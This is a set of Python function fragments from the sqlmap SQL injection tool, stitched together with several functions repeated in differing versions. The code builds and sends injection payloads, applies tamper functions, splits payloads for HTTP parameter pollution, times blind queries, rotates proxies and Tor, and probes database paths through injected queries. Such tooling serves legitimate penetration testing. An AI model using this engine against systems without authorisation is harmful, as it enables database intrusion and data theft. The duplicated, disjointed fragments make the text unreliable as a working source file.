def __retryProxy(**kwargs): threadData = getCurrentThreadData() threadData.retriesCount += 1 if kb.testMode and kb.previousMethod == PAYLOAD.METHOD.TIME: # timed based payloads can cause web server unresponsiveness # if the injectable piece of code is some kind of JOIN-like query warnMsg = "most probably web server instance hasn't recovered yet " warnMsg += "from previous timed based payload. If the problem " warnMsg += "persists please wait for few minutes and rerun " warnMsg += "without flag T in --technique option " warnMsg += "(e.g. --flush-session --technique=BEUS) or try to " warnMsg += "lower the --time-sec value (e.g. --time-sec=2)" singleTimeWarnMessage(warnMsg) elif kb.originalPage is None: warnMsg = "if the problem persists please check that the provided " warnMsg += "target url is valid. If it is, you can try to rerun " warnMsg += "with the --random-agent switch turned on " warnMsg += "and/or proxy switches (--ignore-proxy, --proxy,...)" singleTimeWarnMessage(warnMsg) elif conf.threads > 1: warnMsg = "if the problem persists please try to lower " warnMsg += "the number of used threads (--threads)" singleTimeWarnMessage(warnMsg) time.sleep(1) kwargs['retrying'] = True return Connect.__getPageProxy(**kwargs)
def direct(query, content=True): select = True query = agent.payloadDirect(query) query = agent.adjustLateValues(query) threadData = getCurrentThreadData() if Backend.isDbms(DBMS.ORACLE) and query.startswith( "SELECT ") and " FROM " not in query: query = "%s FROM DUAL" % query for sqlTitle, sqlStatements in SQL_STATEMENTS.items(): for sqlStatement in sqlStatements: if query.lower().startswith( sqlStatement) and sqlTitle != "SQL SELECT statement": select = False break if select and not query.upper().startswith("SELECT "): query = "SELECT " + query logger.log(9, query) output = hashDBRetrieve(query, True, True) start = time.time() if not select and "EXEC " not in query: _ = timeout(func=conf.dbmsConnector.execute, args=(query, ), duration=conf.timeout, default=None) elif not (output and "sqlmapoutput" not in query and "sqlmapfile" not in query): output = timeout(func=conf.dbmsConnector.select, args=(query, ), duration=conf.timeout, default=None) hashDBWrite(query, output, True) elif output: infoMsg = "resumed: %s..." % getUnicode(output, UNICODE_ENCODING)[:20] logger.info(infoMsg) threadData.lastQueryDuration = calculateDeltaSeconds(start) if not output: return output elif content: if output and isListLike(output): if len(output[0]) == 1: if len(output) > 1: output = map(lambda _: _[0], output) else: output = output[0][0] retVal = getUnicode(output, noneToNull=True) return safecharencode(retVal) if kb.safeCharEncode else retVal else: for line in output: if line[0] in (1, -1): return True else: return False
def direct(query, content=True): select = True query = agent.payloadDirect(query) query = agent.adjustLateValues(query) threadData = getCurrentThreadData() if Backend.isDbms(DBMS.ORACLE) and query.upper().startswith( "SELECT ") and " FROM " not in query.upper(): query = "%s FROM DUAL" % query for sqlTitle, sqlStatements in SQL_STATEMENTS.items(): for sqlStatement in sqlStatements: if query.lower().startswith( sqlStatement) and sqlTitle != "SQL SELECT statement": select = False break if select and not query.upper().startswith("SELECT "): query = "SELECT %s" % query logger.log(CUSTOM_LOGGING.PAYLOAD, query) output = hashDBRetrieve(query, True, True) start = time.time() if not select and "EXEC " not in query.upper(): timeout(func=conf.dbmsConnector.execute, args=(query, ), duration=conf.timeout, default=None) elif not (output and ("%soutput" % TAKEOVER_TABLE_PREFIX) not in query and ("%sfile" % TAKEOVER_TABLE_PREFIX) not in query): output, state = timeout(func=conf.dbmsConnector.select, args=(query, ), duration=conf.timeout, default=None) if state == TIMEOUT_STATE.NORMAL: hashDBWrite(query, output, True) elif state == TIMEOUT_STATE.TIMEOUT: conf.dbmsConnector.close() conf.dbmsConnector.connect() elif output: infoMsg = "resumed: %s..." % getUnicode(output, UNICODE_ENCODING)[:20] logger.info(infoMsg) threadData.lastQueryDuration = calculateDeltaSeconds(start) if not output: return output elif content: if output and isListLike(output): if len(output[0]) == 1: output = [_[0] for _ in output] retVal = getUnicode(output, noneToNull=True) return safecharencode(retVal) if kb.safeCharEncode else retVal else: return extractExpectedValue(output, EXPECTED.BOOL)
def direct(query, content=True): select = True query = agent.payloadDirect(query) query = agent.adjustLateValues(query) threadData = getCurrentThreadData() if Backend.isDbms(DBMS.ORACLE) and query.startswith("SELECT ") and " FROM " not in query: query = "%s FROM DUAL" % query for sqlTitle, sqlStatements in SQL_STATEMENTS.items(): for sqlStatement in sqlStatements: if query.lower().startswith(sqlStatement) and sqlTitle != "SQL SELECT statement": select = False break if select and not query.upper().startswith("SELECT "): query = "SELECT " + query logger.log(9, query) output = hashDBRetrieve(query, True, True) start = time.time() if not select and "EXEC " not in query: _ = timeout(func=conf.dbmsConnector.execute, args=(query,), duration=conf.timeout, default=None) elif not (output and "sqlmapoutput" not in query and "sqlmapfile" not in query): output = timeout(func=conf.dbmsConnector.select, args=(query,), duration=conf.timeout, default=None) hashDBWrite(query, output, True) elif output: infoMsg = "resumed: %s..." % getUnicode(output, UNICODE_ENCODING)[:20] logger.info(infoMsg) threadData.lastQueryDuration = calculateDeltaSeconds(start) if not output: return output elif content: if output and isListLike(output): if len(output[0]) == 1: if len(output) > 1: output = map(lambda _: _[0], output) else: output = output[0][0] retVal = getUnicode(output, noneToNull=True) return safecharencode(retVal) if kb.safeCharEncode else retVal else: for line in output: if line[0] in (1, -1): return True else: return False
def direct(query, content=True): select = True query = agent.payloadDirect(query) query = agent.adjustLateValues(query) threadData = getCurrentThreadData() if Backend.isDbms(DBMS.ORACLE) and query.upper().startswith("SELECT ") and " FROM " not in query.upper(): query = "%s FROM DUAL" % query for sqlTitle, sqlStatements in SQL_STATEMENTS.items(): for sqlStatement in sqlStatements: if query.lower().startswith(sqlStatement) and sqlTitle != "SQL SELECT statement": select = False break if select and not query.upper().startswith("SELECT "): query = "SELECT %s" % query logger.log(CUSTOM_LOGGING.PAYLOAD, query) output = hashDBRetrieve(query, True, True) start = time.time() if not select and "EXEC " not in query.upper(): timeout(func=conf.dbmsConnector.execute, args=(query,), duration=conf.timeout, default=None) elif not (output and "sqlmapoutput" not in query and "sqlmapfile" not in query): output, state = timeout(func=conf.dbmsConnector.select, args=(query,), duration=conf.timeout, default=None) if state == TIMEOUT_STATE.NORMAL: hashDBWrite(query, output, True) elif state == TIMEOUT_STATE.TIMEOUT: conf.dbmsConnector.close() conf.dbmsConnector.connect() elif output: infoMsg = "resumed: %s..." % getUnicode(output, UNICODE_ENCODING)[:20] logger.info(infoMsg) threadData.lastQueryDuration = calculateDeltaSeconds(start) if not output: return output elif content: if output and isListLike(output): if len(output[0]) == 1: output = [_[0] for _ in output] retVal = getUnicode(output, noneToNull=True) return safecharencode(retVal) if kb.safeCharEncode else retVal else: return extractExpectedValue(output, EXPECTED.BOOL)
def _retryProxy(**kwargs): threadData = getCurrentThreadData() threadData.retriesCount += 1 if threadData.retriesCount >= conf.retries: warnMsg = "changing proxy" logger.warn(warnMsg) conf.proxy = conf.proxyList[0] conf.proxyList = conf.proxyList[1:] + conf.proxyList[:1] setHTTPProxy() if kb.testMode and kb.previousMethod == PAYLOAD.METHOD.TIME: # timed based payloads can cause web server unresponsiveness # if the injectable piece of code is some kind of JOIN-like query warnMsg = "most probably web server instance hasn't recovered yet " warnMsg += "from previous timed based payload. If the problem " warnMsg += "persists please wait for few minutes and rerun " warnMsg += "without flag T in option '--technique' " warnMsg += "(e.g. '--flush-session --technique=BEUS') or try to " warnMsg += "lower the value of option '--time-sec' (e.g. '--time-sec=2')" singleTimeWarnMessage(warnMsg) elif kb.originalPage is None: if conf.tor: warnMsg = "please make sure that you have " warnMsg += "Tor installed and running so " warnMsg += "you could successfully use " warnMsg += "switch '--tor' " if IS_WIN: warnMsg += "(e.g. 'https://www.torproject.org/download/download.html.en')" else: warnMsg += "(e.g. 'https://help.ubuntu.com/community/Tor')" else: warnMsg = "if the problem persists please check that the provided " warnMsg += "target URL is valid. In case that it is, you can try to rerun " warnMsg += "with the switch '--random-agent' turned on " warnMsg += "and/or proxy switches ('--ignore-proxy', '--proxy',...)" singleTimeWarnMessage(warnMsg) elif conf.threads > 1: warnMsg = "if the problem persists please try to lower " warnMsg += "the number of used threads (option '--threads')" singleTimeWarnMessage(warnMsg) time.sleep(1) kwargs['retrying'] = True return Connect._getPageProxy(**kwargs)
def _retryProxy(**kwargs): threadData = getCurrentThreadData() threadData.retriesCount += 1 if conf.proxyList and threadData.retriesCount >= conf.retries: warnMsg = "changing proxy" logger.warn(warnMsg) conf.proxy = conf.proxyList[0] conf.proxyList = conf.proxyList[1:] + conf.proxyList[:1] setHTTPProxy() if kb.testMode and kb.previousMethod == PAYLOAD.METHOD.TIME: # timed based payloads can cause web server unresponsiveness # if the injectable piece of code is some kind of JOIN-like query warnMsg = "most probably web server instance hasn't recovered yet " warnMsg += "from previous timed based payload. If the problem " warnMsg += "persists please wait for few minutes and rerun " warnMsg += "without flag T in option '--technique' " warnMsg += "(e.g. '--flush-session --technique=BEUS') or try to " warnMsg += "lower the value of option '--time-sec' (e.g. '--time-sec=2')" singleTimeWarnMessage(warnMsg) elif kb.originalPage is None: if conf.tor: warnMsg = "please make sure that you have " warnMsg += "Tor installed and running so " warnMsg += "you could successfully use " warnMsg += "switch '--tor' " if IS_WIN: warnMsg += "(e.g. 'https://www.torproject.org/download/download.html.en')" else: warnMsg += "(e.g. 'https://help.ubuntu.com/community/Tor')" else: warnMsg = "if the problem persists please check that the provided " warnMsg += "target URL is valid. In case that it is, you can try to rerun " warnMsg += "with the switch '--random-agent' turned on " warnMsg += "and/or proxy switches ('--ignore-proxy', '--proxy',...)" singleTimeWarnMessage(warnMsg) elif conf.threads > 1: warnMsg = "if the problem persists please try to lower " warnMsg += "the number of used threads (option '--threads')" singleTimeWarnMessage(warnMsg) time.sleep(1) kwargs['retrying'] = True return Connect._getPageProxy(**kwargs)
def _getDatabaseDir(self): retVal = None infoMsg = "searching for database directory" logger.info(infoMsg) randStr = randomStr() inject.checkBooleanExpression("EXISTS(SELECT * FROM %s.%s WHERE [RANDNUM]=[RANDNUM])" % (randStr, randStr)) if wasLastResponseDBMSError(): threadData = getCurrentThreadData() match = re.search(r"Could not find file\s+'([^']+?)'", threadData.lastErrorPage[1]) if match: retVal = match.group(1).rstrip("%s.mdb" % randStr) if retVal.endswith('\\'): retVal = retVal[:-1] return retVal
def _getDatabaseDir(self): retVal = None infoMsg = "searching for database directory" logger.info(infoMsg) randStr = randomStr() inject.checkBooleanExpression("EXISTS(SELECT * FROM %s.%s WHERE [RANDNUM]=[RANDNUM])" % (randStr, randStr)) if wasLastResponseDBMSError(): threadData = getCurrentThreadData() match = re.search("Could not find file\s+'([^']+?)'", threadData.lastErrorPage[1]) if match: retVal = match.group(1).rstrip("%s.mdb" % randStr) if retVal.endswith('\\'): retVal = retVal[:-1] return retVal
def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True): """ This method calls a function to get the target url page content and returns its page MD5 hash or a boolean value in case of string match check ('--string' command line parameter) """ if conf.direct: return direct(value, content) get = None post = None cookie = None ua = None referer = None host = None page = None pageLength = None uri = None code = None skipUrlEncode = conf.skipUrlEncode if not place: place = kb.injection.place or PLACE.GET raise404 = place != PLACE.URI if raise404 is None else raise404 value = agent.adjustLateValues(value) payload = agent.extractPayload(value) threadData = getCurrentThreadData() if skipUrlEncode is None and conf.httpHeaders: headers = dict(conf.httpHeaders) _ = max(headers[_] if _.upper() == HTTPHEADER.CONTENT_TYPE.upper() else None for _ in headers.keys()) if _ and "urlencoded" not in _: skipUrlEncode = True if payload: if kb.tamperFunctions: for function in kb.tamperFunctions: payload = function(payload=payload, headers=auxHeaders) if not isinstance(payload, basestring): errMsg = "tamper function '%s' returns " % function.func_name errMsg += "invalid payload type ('%s')" % type(payload) raise SqlmapValueException, errMsg value = agent.replacePayload(value, payload) logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload)) if place == PLACE.CUSTOM_POST: if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML): # payloads in SOAP/XML should have chars > and < replaced # with their HTML encoded counterparts payload = payload.replace('>', ">").replace('<', "<") elif kb.postHint == POST_HINT.JSON: if payload.startswith('"') and payload.endswith('"'): payload = json.dumps(payload[1:-1]) else: payload = json.dumps(payload)[1:-1] value = agent.replacePayload(value, payload) else: if place != PLACE.URI or (value and payload and '?' in value and value.find('?') < value.find(payload)): # GET, URI and Cookie need to be throughly URL encoded (POST is encoded down below) payload = urlencode(payload, '%', False, True) if place in (PLACE.GET, PLACE.COOKIE, PLACE.URI) and not skipUrlEncode else payload value = agent.replacePayload(value, payload) if conf.hpp: if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_API.ASP, WEB_API.ASPX)): warnMsg = "HTTP parameter pollution should work only against " warnMsg += "ASP(.NET) targets" singleTimeWarnMessage(warnMsg) if place in (PLACE.GET, PLACE.POST): _ = re.escape(PAYLOAD_DELIMITER) match = re.search("(?P<name>\w+)=%s(?P<value>.+?)%s" % (_, _), value) if match: payload = match.group("value") for splitter in (urlencode(' '), ' '): if splitter in payload: prefix, suffix = ("*/", "/*") if splitter == ' ' else (urlencode(_) for _ in ("*/", "/*")) parts = payload.split(splitter) parts[0] = "%s%s" % (parts[0], suffix) parts[-1] = "%s%s=%s%s" % (DEFAULT_GET_POST_DELIMITER, match.group("name"), prefix, parts[-1]) for i in xrange(1, len(parts) - 1): parts[i] = "%s%s=%s%s%s" % (DEFAULT_GET_POST_DELIMITER, match.group("name"), prefix, parts[i], suffix) payload = "".join(parts) for splitter in (urlencode(','), ','): payload = payload.replace(splitter, "%s%s=" % (DEFAULT_GET_POST_DELIMITER, match.group("name"))) value = agent.replacePayload(value, payload) else: warnMsg = "HTTP parameter pollution works only with regular " warnMsg += "GET and POST parameters" singleTimeWarnMessage(warnMsg) if place: value = agent.removePayloadDelimiters(value) if conf.checkPayload: checkPayload(value) if PLACE.GET in conf.parameters: get = conf.parameters[PLACE.GET] if place != PLACE.GET or not value else value if PLACE.POST in conf.parameters: post = conf.parameters[PLACE.POST] if place != PLACE.POST or not value else value if PLACE.CUSTOM_POST in conf.parameters: post = conf.parameters[PLACE.CUSTOM_POST].replace(CUSTOM_INJECTION_MARK_CHAR, "") if place != PLACE.CUSTOM_POST or not value else value if PLACE.COOKIE in conf.parameters: cookie = conf.parameters[PLACE.COOKIE] if place != PLACE.COOKIE or not value else value if PLACE.USER_AGENT in conf.parameters: ua = conf.parameters[PLACE.USER_AGENT] if place != PLACE.USER_AGENT or not value else value if PLACE.REFERER in conf.parameters: referer = conf.parameters[PLACE.REFERER] if place != PLACE.REFERER or not value else value if PLACE.HOST in conf.parameters: host = conf.parameters[PLACE.HOST] if place != PLACE.HOST or not value else value if PLACE.URI in conf.parameters: uri = conf.url if place != PLACE.URI or not value else value else: uri = conf.url if conf.rParam: def _randomizeParameter(paramString, randomParameter): retVal = paramString match = re.search("%s=(?P<value>[^&;]+)" % randomParameter, paramString) if match: origValue = match.group("value") retVal = re.sub("%s=[^&;]+" % randomParameter, "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString) return retVal for randomParameter in conf.rParam: for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE): if item in conf.parameters: if item == PLACE.GET and get: get = _randomizeParameter(get, randomParameter) elif item == PLACE.POST and post: post = _randomizeParameter(post, randomParameter) elif item == PLACE.COOKIE and cookie: cookie = _randomizeParameter(cookie, randomParameter) if conf.evalCode: delimiter = conf.pDel or DEFAULT_GET_POST_DELIMITER variables = {} originals = {} for item in filter(None, (get, post)): for part in item.split(delimiter): if '=' in part: name, value = part.split('=', 1) evaluateCode("%s=%s" % (name, repr(value)), variables) originals.update(variables) evaluateCode(conf.evalCode, variables) for name, value in variables.items(): if name != "__builtins__" and originals.get(name, "") != value: if isinstance(value, (basestring, int)): value = unicode(value) if '%s=' % name in (get or ""): get = re.sub("((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, get) elif '%s=' % name in (post or ""): post = re.sub("((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, post) elif post is not None: post += "%s%s=%s" % (delimiter, name, value) else: get += "%s%s=%s" % (delimiter, name, value) get = urlencode(get, limit=True) if post is not None: if place not in (PLACE.POST, PLACE.CUSTOM_POST) and hasattr(post, UNENCODED_ORIGINAL_VALUE): post = getattr(post, UNENCODED_ORIGINAL_VALUE) elif not skipUrlEncode and kb.postHint not in POST_HINT_CONTENT_TYPES.keys(): post = urlencode(post) if timeBasedCompare: if len(kb.responseTimes) < MIN_TIME_RESPONSES: clearConsoleLine() if conf.tor: warnMsg = "it's highly recommended to avoid usage of switch '--tor' for " warnMsg += "time-based injections because of its high latency time" singleTimeWarnMessage(warnMsg) warnMsg = "time-based comparison needs larger statistical " warnMsg += "model. Making a few dummy requests, please wait.." singleTimeWarnMessage(warnMsg) while len(kb.responseTimes) < MIN_TIME_RESPONSES: Connect.queryPage(content=True) deviation = stdev(kb.responseTimes) if deviation > WARN_TIME_STDEV: kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE warnMsg = "there is considerable lagging " warnMsg += "in connection response(s). Please use as high " warnMsg += "value for option '--time-sec' as possible (e.g. " warnMsg += "%d or more)" % (conf.timeSec * 2) logger.critical(warnMsg) elif not kb.testMode: warnMsg = "it is very important not to stress the network adapter's " warnMsg += "bandwidth during usage of time-based queries" singleTimeWarnMessage(warnMsg) if conf.safUrl and conf.saFreq > 0: kb.queryCounter += 1 if kb.queryCounter % conf.saFreq == 0: Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host) start = time.time() if kb.nullConnection and not content and not response and not timeBasedCompare: noteResponseTime = False if kb.nullConnection == NULLCONNECTION.HEAD: method = HTTPMETHOD.HEAD elif kb.nullConnection == NULLCONNECTION.RANGE: if not auxHeaders: auxHeaders = {} auxHeaders[HTTPHEADER.RANGE] = "bytes=-1" _, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404) if headers: if kb.nullConnection == NULLCONNECTION.HEAD and HTTPHEADER.CONTENT_LENGTH in headers: pageLength = int(headers[HTTPHEADER.CONTENT_LENGTH]) elif kb.nullConnection == NULLCONNECTION.RANGE and HTTPHEADER.CONTENT_RANGE in headers: pageLength = int(headers[HTTPHEADER.CONTENT_RANGE][headers[HTTPHEADER.CONTENT_RANGE].find('/') + 1:]) if not pageLength: page, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare) if conf.secondOrder: page, headers, code = Connect.getPage(url=conf.secondOrder, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) threadData.lastQueryDuration = calculateDeltaSeconds(start) kb.originalCode = kb.originalCode or code if kb.testMode: kb.testQueryCount += 1 if timeBasedCompare: return wasLastRequestDelayed() elif noteResponseTime: kb.responseTimes.append(threadData.lastQueryDuration) if not response and removeReflection: page = removeReflectiveValues(page, payload) kb.maxConnectionsFlag = re.search(MAX_CONNECTIONS_REGEX, page or "", re.I) is not None kb.permissionFlag = re.search(PERMISSION_DENIED_REGEX, page or "", re.I) is not None if content or response: return page, headers if getRatioValue: return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength) elif pageLength or page: return comparison(page, headers, code, getRatioValue, pageLength) else: return False
def getPage(**kwargs): """ This method connects to the target URL or proxy and returns the target URL page content """ if conf.delay is not None and isinstance( conf.delay, (int, float)) and conf.delay > 0: time.sleep(conf.delay) elif conf.cpuThrottle: cpuThrottle(conf.cpuThrottle) if conf.dummy: return randomStr(int(randomInt()), alphabet=[chr(_) for _ in xrange(256) ]), {}, int(randomInt()) threadData = getCurrentThreadData() with kb.locks.request: kb.requestCounter += 1 threadData.lastRequestUID = kb.requestCounter url = kwargs.get("url", None) or conf.url get = kwargs.get("get", None) post = kwargs.get("post", None) method = kwargs.get("method", None) cookie = kwargs.get("cookie", None) ua = kwargs.get("ua", None) or conf.agent referer = kwargs.get("referer", None) or conf.referer host = kwargs.get("host", None) or conf.host direct_ = kwargs.get("direct", False) multipart = kwargs.get("multipart", False) silent = kwargs.get("silent", False) raise404 = kwargs.get("raise404", True) timeout = kwargs.get("timeout", None) or conf.timeout auxHeaders = kwargs.get("auxHeaders", None) response = kwargs.get("response", False) ignoreTimeout = kwargs.get("ignoreTimeout", False) or kb.ignoreTimeout refreshing = kwargs.get("refreshing", False) retrying = kwargs.get("retrying", False) crawling = kwargs.get("crawling", False) skipRead = kwargs.get("skipRead", False) if not urlparse.urlsplit(url).netloc: url = urlparse.urljoin(conf.url, url) # flag to know if we are dealing with the same target host target = reduce( lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], [url, conf.url or ""])) if not retrying: # Reset the number of connection retries threadData.retriesCount = 0 # fix for known issue when urllib2 just skips the other part of provided # url splitted with space char while urlencoding it in the later phase url = url.replace(" ", "%20") conn = None code = None page = None _ = urlparse.urlsplit(url) requestMsg = u"HTTP request [#%d]:\n%s " % ( threadData.lastRequestUID, method or (HTTPMETHOD.POST if post is not None else HTTPMETHOD.GET)) requestMsg += ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) if not any( (refreshing, crawling)) else url responseMsg = u"HTTP response " requestHeaders = u"" responseHeaders = None logHeaders = u"" skipLogTraffic = False raise404 = raise404 and not kb.ignoreNotFound # support for non-latin (e.g. cyrillic) URLs as urllib/urllib2 doesn't # support those by default url = asciifyUrl(url) # fix for known issues when using url in unicode format # (e.g. UnicodeDecodeError: "url = url + '?' + query" in redirect case) url = unicodeencode(url) try: socket.setdefaulttimeout(timeout) if direct_: if '?' in url: url, params = url.split('?', 1) params = urlencode(params) url = "%s?%s" % (url, params) requestMsg += "?%s" % params elif multipart: # Needed in this form because of potential circle dependency # problem (option -> update -> connect -> option) from lib.core.option import proxyHandler multipartOpener = urllib2.build_opener( proxyHandler, multipartpost.MultipartPostHandler) conn = multipartOpener.open(unicodeencode(url), multipart) page = Connect._connReadProxy(conn) if not skipRead else None responseHeaders = conn.info() responseHeaders[URI_HTTP_HEADER] = conn.geturl() page = decodePage( page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE)) return page elif any((refreshing, crawling)): pass elif target: if conf.forceSSL and urlparse.urlparse(url).scheme != "https": url = re.sub("\Ahttp:", "https:", url, re.I) url = re.sub(":80/", ":443/", url, re.I) if PLACE.GET in conf.parameters and not get: get = conf.parameters[PLACE.GET] if not conf.skipUrlEncode: get = urlencode(get, limit=True) if get: url = "%s?%s" % (url, get) requestMsg += "?%s" % get if PLACE.POST in conf.parameters and not post and method in ( None, HTTPMETHOD.POST): post = conf.parameters[PLACE.POST] elif get: url = "%s?%s" % (url, get) requestMsg += "?%s" % get requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str # Prepare HTTP headers headers = forgeHeaders({ HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer }) if kb.authHeader: headers[HTTP_HEADER.AUTHORIZATION] = kb.authHeader if kb.proxyAuthHeader: headers[HTTP_HEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE headers[ HTTP_HEADER. ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity" headers[HTTP_HEADER.HOST] = host or getHostHeader(url) if post is not None and HTTP_HEADER.CONTENT_TYPE not in headers: headers[ HTTP_HEADER.CONTENT_TYPE] = POST_HINT_CONTENT_TYPES.get( kb.postHint, DEFAULT_CONTENT_TYPE) if headers.get( HTTP_HEADER.CONTENT_TYPE) == POST_HINT_CONTENT_TYPES[ POST_HINT.MULTIPART]: warnMsg = "missing 'boundary parameter' in '%s' header. " % HTTP_HEADER.CONTENT_TYPE warnMsg += "Will try to reconstruct" singleTimeWarnMessage(warnMsg) boundary = findMultipartPostBoundary(conf.data) if boundary: headers[HTTP_HEADER.CONTENT_TYPE] = "%s; boundary=%s" % ( headers[HTTP_HEADER.CONTENT_TYPE], boundary) if auxHeaders: for key, item in auxHeaders.items(): headers[key] = item for key, item in headers.items(): del headers[key] headers[unicodeencode(key, kb.pageEncoding)] = unicodeencode( item, kb.pageEncoding) post = unicodeencode(post, kb.pageEncoding) if method: req = MethodRequest(url, post, headers) req.set_method(method) else: req = urllib2.Request(url, post, headers) requestHeaders += "\n".join( "%s: %s" % (key.capitalize() if isinstance(key, basestring) else key, getUnicode(value)) for (key, value) in req.header_items()) if not getRequestHeader(req, HTTP_HEADER.COOKIE) and conf.cj: conf.cj._policy._now = conf.cj._now = int(time.time()) cookies = conf.cj._cookies_for_request(req) requestHeaders += "\n%s" % ("Cookie: %s" % ";".join( "%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value)) for cookie in cookies)) if post is not None: if not getRequestHeader(req, HTTP_HEADER.CONTENT_LENGTH): requestHeaders += "\n%s: %d" % (string.capwords( HTTP_HEADER.CONTENT_LENGTH), len(post)) if not getRequestHeader(req, HTTP_HEADER.CONNECTION): requestHeaders += "\n%s: close" % HTTP_HEADER.CONNECTION requestMsg += "\n%s" % requestHeaders if post is not None: requestMsg += "\n\n%s" % getUnicode(post) requestMsg += "\n" threadData.lastRequestMsg = requestMsg logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) conn = urllib2.urlopen(req) if not kb.authHeader and getRequestHeader( req, HTTP_HEADER.AUTHORIZATION ) and conf.authType == AUTH_TYPE.BASIC: kb.authHeader = getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) if not kb.proxyAuthHeader and getRequestHeader( req, HTTP_HEADER.PROXY_AUTHORIZATION): kb.proxyAuthHeader = getRequestHeader( req, HTTP_HEADER.PROXY_AUTHORIZATION) # Return response object if response: return conn, None, None # Get HTTP response if hasattr(conn, 'redurl'): page = (threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO\ else Connect._connReadProxy(conn)) if not skipRead else None skipLogTraffic = kb.redirectChoice == REDIRECTION.NO code = conn.redcode else: page = Connect._connReadProxy(conn) if not skipRead else None code = code or conn.code responseHeaders = conn.info() responseHeaders[URI_HTTP_HEADER] = conn.geturl() page = decodePage( page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE)) status = getUnicode(conn.msg) if extractRegexResult(META_REFRESH_REGEX, page) and not refreshing: url = extractRegexResult(META_REFRESH_REGEX, page) debugMsg = "got HTML meta refresh header" logger.debug(debugMsg) if kb.alwaysRefresh is None: msg = "sqlmap got a refresh request " msg += "(redirect like response common to login pages). " msg += "Do you want to apply the refresh " msg += "from now on (or stay on the original page)? [Y/n]" choice = readInput(msg, default="Y") kb.alwaysRefresh = choice not in ("n", "N") if kb.alwaysRefresh: if url.lower().startswith('http://'): kwargs['url'] = url else: kwargs['url'] = conf.url[:conf.url.rfind('/') + 1] + url threadData.lastRedirectMsg = (threadData.lastRequestUID, page) kwargs['refreshing'] = True kwargs['get'] = None kwargs['post'] = None try: return Connect._getPageProxy(**kwargs) except SqlmapSyntaxException: pass # Explicit closing of connection object if not conf.keepAlive: try: if hasattr(conn.fp, '_sock'): conn.fp._sock.close() conn.close() except Exception, msg: warnMsg = "problem occurred during connection closing ('%s')" % msg logger.warn(warnMsg) except urllib2.HTTPError, e: page = None responseHeaders = None try: page = e.read() if not skipRead else None responseHeaders = e.info() responseHeaders[URI_HTTP_HEADER] = e.geturl() page = decodePage( page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE)) except socket.timeout: warnMsg = "connection timed out while trying " warnMsg += "to get error page information (%d)" % e.code logger.warn(warnMsg) return None, None, None except KeyboardInterrupt: raise except: pass finally: page = page if isinstance(page, unicode) else getUnicode(page) code = e.code threadData.lastHTTPError = (threadData.lastRequestUID, code) kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1 status = getUnicode(e.msg) responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status) if responseHeaders: logHeaders = "\n".join("%s: %s" % (getUnicode(key.capitalize( ) if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()) logHTTPTraffic( requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])) skipLogTraffic = True if conf.verbose <= 5: responseMsg += getUnicode(logHeaders) elif conf.verbose > 5: responseMsg += "%s\n\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]) logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) if e.code == httplib.UNAUTHORIZED: errMsg = "not authorized, try to provide right HTTP " errMsg += "authentication type and valid credentials (%d)" % code raise SqlmapConnectionException(errMsg) elif e.code == httplib.NOT_FOUND: if raise404: errMsg = "page not found (%d)" % code raise SqlmapConnectionException(errMsg) else: debugMsg = "page not found (%d)" % code singleTimeLogMessage(debugMsg, logging.DEBUG) processResponse(page, responseHeaders) elif e.code == httplib.GATEWAY_TIMEOUT: if ignoreTimeout: return None, None, None else: warnMsg = "unable to connect to the target URL (%d - %s)" % ( e.code, httplib.responses[e.code]) if threadData.retriesCount < conf.retries and not kb.threadException: warnMsg += ". sqlmap is going to retry the request" logger.critical(warnMsg) return Connect._retryProxy(**kwargs) elif kb.testMode: logger.critical(warnMsg) return None, None, None else: raise SqlmapConnectionException(warnMsg) else: debugMsg = "got HTTP error code: %d (%s)" % (code, status) logger.debug(debugMsg)
